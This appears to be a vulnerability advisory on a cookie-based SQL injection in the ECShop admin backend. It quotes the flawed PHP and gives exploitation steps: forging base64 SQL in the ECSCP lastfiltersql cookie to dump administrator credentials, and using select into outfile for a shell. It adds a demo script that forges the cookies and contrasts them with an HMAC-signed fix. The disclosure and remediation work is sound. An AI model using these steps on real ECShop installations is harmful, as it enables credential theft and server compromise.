An injection in the admin backend is normally worth little. Here, however, an arbitrary statement can be built, including drop database; and select ... into outfile, and together with the path disclosed by error messages that is enough to get a shell. Look at admin\include\lib_main.php, line 718:
```php
function get_filter($param_str = '')
{
    $filterfile = basename(PHP_SELF, '.php');
    if ($param_str)
    {
        $filterfile .= $param_str;
    }
    // The only "check" is that lastfilterfile matches crc32 of the script name,
    // a value anyone can compute.
    if (isset($_GET['uselastfilter']) && isset($_COOKIE['ECSCP']['lastfilterfile'])
        && $_COOKIE['ECSCP']['lastfilterfile'] == sprintf('%X', crc32($filterfile)))
    {
        return array(
            'filter' => unserialize(urldecode($_COOKIE['ECSCP']['lastfilter'])),
            // The SQL is taken straight from the cookie via base64_decode; GPC escaping never touches it.
            'sql'    => base64_decode($_COOKIE['ECSCP']['lastfiltersql'])
        );
    }
    else
    {
        return false;
    }
}
```
The value bypasses GPC escaping entirely, and the element returned under the 'sql' key is a complete SQL statement. Presumably it goes straight into a query; looking around, get_filter() is called in many places. Take article.php, line 624:
```php
function get_articleslist()
{
    $result = get_filter();
    if ($result === false)
    {
        /* ... build $filter and $sql from the request, then set_filter($filter, $sql) ... */
    }
    else
    {
        $sql    = $result['sql'];    // base64-decoded straight from the cookie, GPC ignored
        $filter = $result['filter'];
    }
    $arr = array();
    $res = $GLOBALS['db']->selectLimit($sql, $filter['page_size'], $filter['start']); // executed as-is
    /* ... fetch rows into $arr ... */
}
```
So whenever get_filter() does not return false, the SQL it returns is executed directly. Log into the ECShop backend and open http://127.0.0.1/admin/article.php?act=list. On this first request get_filter() returns false, so the if branch runs and the set_filter() call at its end sets the cookies: you will see three new ECSCP[...] cookies. Replace ECSCP[lastfiltersql] with the base64 of your own statement (the payload used here dumps the administrator account and password); other statements, such as one that writes a shell, work just as well. Then append uselastfilter=1 to the URL so that get_filter() takes the cookie branch.
If the statement fails, the database error message reveals the physical path, which can then be used in select ... into outfile.
Solution: after base64_decode and urldecode, validate what came out of the cookie before using it; the client must not be able to supply the SQL that gets executed.
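The following is an added example, not ECShop's own code, covering both the cookie forgery described above and the fix. It reimplements the page's get_filter() check as a function, forges the three ECSCP cookies the way an attacker would (the script name "article", the page_size/start filter values and the ecs_admin_user table are assumptions for the demo), and then shows a hardened set_filter()/get_filter() pair that signs the cookie contents with an HMAC under a server-side key (FILTER_HMAC_KEY is an assumed config value; the HMAC approach is a swapped-in technique, not the vendor's patch). The forged cookie is accepted by the vulnerable check and rejected by the hardened one, while a cookie the server itself set still round-trips.

```php
<?php
// Added example (not ECShop code): forged ECSCP cookies against the vulnerable
// check and against an HMAC-signed replacement.

// Mirrors the page's lib_main.php logic: the tag is crc32 of the script name,
// which is public information, so anyone can compute it.
function filter_tag($filterfile)
{
    return sprintf('%X', crc32($filterfile));
}

function get_filter_vulnerable(array $get, array $cookie, $filterfile)
{
    if (isset($get['uselastfilter']) && isset($cookie['ECSCP']['lastfilterfile'])
        && $cookie['ECSCP']['lastfilterfile'] == filter_tag($filterfile)) {
        return array(
            'filter' => unserialize(urldecode($cookie['ECSCP']['lastfilter'])),
            'sql'    => base64_decode($cookie['ECSCP']['lastfiltersql']), // attacker-controlled
        );
    }
    return false;
}

// Hardened version: every value stored in the cookie is covered by an HMAC
// keyed with a secret the client never sees (assumed config value).
define('FILTER_HMAC_KEY', 'replace-with-a-server-side-secret');

function filter_mac($filterfile, $filter_enc, $sql_enc)
{
    return hash_hmac('sha256', $filterfile . "\0" . $filter_enc . "\0" . $sql_enc, FILTER_HMAC_KEY);
}

function set_filter_hardened(array $filter, $sql, $filterfile)
{
    $filter_enc = urlencode(serialize($filter));
    $sql_enc    = base64_encode($sql);
    return array(
        'lastfilterfile' => filter_tag($filterfile),
        'lastfilter'     => $filter_enc,
        'lastfiltersql'  => $sql_enc,
        'lastfiltermac'  => filter_mac($filterfile, $filter_enc, $sql_enc),
    );
}

function get_filter_hardened(array $get, array $cookie, $filterfile)
{
    $c = isset($cookie['ECSCP']) ? $cookie['ECSCP'] : array();
    if (!isset($get['uselastfilter'])
        || !isset($c['lastfilterfile'], $c['lastfilter'], $c['lastfiltersql'], $c['lastfiltermac'])) {
        return false;
    }
    if ($c['lastfilterfile'] !== filter_tag($filterfile)) {
        return false;
    }
    // Constant-time compare; a cookie without a valid MAC was not set by this server.
    $expected = filter_mac($filterfile, $c['lastfilter'], $c['lastfiltersql']);
    if (!hash_equals($expected, $c['lastfiltermac'])) {
        return false;
    }
    $filter = unserialize(urldecode($c['lastfilter']));
    if (!is_array($filter)) {
        return false;
    }
    return array('filter' => $filter, 'sql' => base64_decode($c['lastfiltersql']));
}

// Attacker side: forge the three cookies exactly as the write-up describes.
$script  = 'article';                                            // basename('article.php', '.php')
$payload = "SELECT user_name, password FROM ecs_admin_user";     // assumed table name
$forged  = array('ECSCP' => array(
    'lastfilterfile' => filter_tag($script),
    'lastfilter'     => urlencode(serialize(array('page_size' => 20, 'start' => 0))),
    'lastfiltersql'  => base64_encode($payload),
));
$get = array('uselastfilter' => '1');

$r = get_filter_vulnerable($get, $forged, $script);
echo "vulnerable: ", ($r === false ? 'rejected' : 'EXECUTES: ' . $r['sql']), "\n";

$r = get_filter_hardened($get, $forged, $script);
echo "hardened:   ", ($r === false ? 'rejected (no valid MAC)' : 'accepted'), "\n";

// A cookie the server itself set still round-trips through the hardened pair.
$legit = array('ECSCP' => set_filter_hardened(array('page_size' => 20, 'start' => 0),
                                              'SELECT * FROM ecs_article', $script));
$r = get_filter_hardened($get, $legit, $script);
echo "hardened legit: ", ($r === false ? 'rejected' : 'accepted: ' . $r['sql']), "\n";
```

Run it with php on the command line. The MAC makes the cookie tamper-evident, but it is still a design smell to ship SQL to the client at all: the cleaner fix is to store only the filter parameters and rebuild the query server-side, and on PHP 7 or later to pass array('allowed_classes' => false) to unserialize() so the lastfilter cookie cannot instantiate objects.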